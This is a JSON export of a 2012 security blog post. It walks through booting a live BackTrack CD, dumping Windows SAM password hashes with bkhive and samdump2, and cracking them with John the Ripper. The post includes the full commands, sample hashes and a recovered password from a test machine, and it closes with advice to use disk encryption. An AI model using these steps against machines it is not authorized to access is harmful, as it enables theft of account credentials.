{"id":443,"date":"2012-03-04T16:54:31","date_gmt":"2012-03-04T15:54:31","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=443"},"modified":"2017-01-10T12:02:08","modified_gmt":"2017-01-10T12:02:08","slug":"mount-and-crack-a-windows-partition-passwords","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/03\/04\/mount-and-crack-a-windows-partition-passwords\/","title":{"rendered":"Mount and crack a windows partition passwords"},"content":{"rendered":"

Simply drop in your backtrack5<\/a> CD or USB and boot from the inserted media. Once booted type startx<\/em>, you can do everything from the console but it’s nicer to have a pretty GUI!<\/p>\n

Left click Places at the top and then click on the windows partition you wish to mount.
\n\"\"<\/a>
\nThen open a terminal and first of all use bkhive<\/em> to dump the syskey bootkey from the windows hive.<\/p>\n

1
2
3
4
5
6
7
8
<\/div><\/td>
root@bt:~# <\/span>bkhive \/<\/span>media\/<\/span>10B9-F2B6\/<\/span>WINNT\/<\/span>system32\/<\/span>config\/<\/span>SYSTEM \/<\/span>root\/<\/span>keyfile.txt
\nbkhive 1.1.1 by Objectif Securite
\nhttp:\/\/<\/span>www.objectif-securite.ch
\noriginal author: ncuomo@<\/span>studenti.unina.it
\n
\nRoot Key : $$<\/span>$PROTO<\/span>.HIV
\nDefault ControlSet: 001
\nBootkey: 7abeb4c282eaef5bfa7a75c197be8f85<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

The next step is to use the SAM file along with the bootkey to get at the hashes:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
<\/div><\/td>
root@bt:~# <\/span>samdump2 \/<\/span>media\/<\/span>10B9-F2B6\/<\/span>WINNT\/<\/span>system32\/<\/span>config\/<\/span>SAM \/<\/span>root\/<\/span>keyfile.txt |<\/span> tee<\/span> hashes.txt
\nsamdump2 1.1.1 by Objectif Securite
\nhttp:\/\/<\/span>www.objectif-securite.ch
\noriginal author: ncuomo@<\/span>studenti.unina.it
\n
\nRoot Key : SAM
\nAdministrator:500<\/span>:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
\nGuest:501<\/span>:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
\nASPNET:1000<\/span>:b50fd6425ebf847332ada17f89c09dc9:63c184dd474f5d902a830545d9bdcfad:::
\nIUSR_WEBINSPECT:1001<\/span>:eeb699201309cb097b3ac7d5e9ecfe77:d61861bf937514d0a6dd9fbf4e7b8376:::
\nIWAM_WEBINSPECT:1002<\/span>:7d5621a567c0b5433c884480b718e30a:a4283d74fda5cd3a65641d52873adb78:::<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now that we have the hashes we can start cracking them using bruteforce or wordlist attacks. In this example I will use john the ripper<\/a> as it’s just a quick demo but you could also use ophcrack<\/a> to utilise rainbow tables<\/a> or hashcat<\/a> to utilise the power of your GPU.<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<\/div><\/td>
root@bt:~# <\/span>cd<\/span> \/<\/span>pentest\/<\/span>passwords\/<\/span>john\/<\/span>
\nroot@<\/span>bt:\/<\/span>pentest\/<\/span>passwords\/<\/span>john# john \/root\/hashes.txt <\/span>
\nWarning: detected hash<\/span> type<\/span> "lm"<\/span>, but the string is also recognized as<\/span> "nt"<\/span>
\nUse the "--format=nt"<\/span> option to force loading these as<\/span> that type<\/span> instead
\nWarning: detected hash<\/span> type<\/span> "lm"<\/span>, but the string is also recognized as<\/span> "nt2"<\/span>
\nUse the "--format=nt2"<\/span> option to force loading these as<\/span> that type<\/span> instead
\nLoaded 9<\/span> password hashes with no different salts (<\/span>LM DES [<\/span>128<\/span>\/<\/span>128<\/span> BS SSE2]<\/span>)<\/span>
\n                 (<\/span>Guest)<\/span>
\nNK               (<\/span>Administrator:2<\/span>)<\/span>
\nHACMEBA          (<\/span>Administrator:1<\/span>)<\/span>
\nguesses: 3<\/span>  time: 0<\/span>:00:00:39<\/span> 0.01<\/span>%<\/span> (<\/span>3<\/span>)<\/span>  c\/<\/span>s: 173509K  trying: 08529IK - 08527NI
\nWarning: passwords printed above might be partial
\nUse the "--show"<\/span> option to display all of the cracked passwords reliably
\nSession aborted<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Bingo!<\/strong> Looks like we’ve got the first and seconds parts of the 9 character password (which was split into 2 hashes of lengths 7chars and then 2 chars, the whole reason we use passwords of more than 14 characters!)<\/p>\n

1
2
3
4
5
6
<\/div><\/td>
root@<\/span>bt:\/<\/span>pentest\/<\/span>passwords\/<\/span>john# john --show \/root\/hashes.txt <\/span>
\nAdministrator:HACMEBANK:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
\nGuest::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
\n
\n3<\/span> password hashes cracked, 6<\/span> left
\nroot@<\/span>bt:\/<\/span>pentest\/<\/span>passwords\/<\/span>john#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Password = HACMEBANK<\/p>\n

So the moral of the story is use full disk encryption<\/a> to protect this type of attack (and as extra precaution prevent booting of CD, DVD and removable media devices)<\/p>\n","protected":false},"excerpt":{"rendered":"

Simply drop in your backtrack5 CD or USB and boot from the inserted media. Once booted type startx, you can do everything from the console but it’s nicer to have a pretty GUI! Left click Places at the top and then click on the windows partition you wish to mount. Then open a terminal and […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[163,162,159,161,160,164,127],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/443"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=443"}],"version-history":[{"count":7,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/443\/revisions"}],"predecessor-version":[{"id":1342,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/443\/revisions\/1342"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=443"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=443"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=443"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}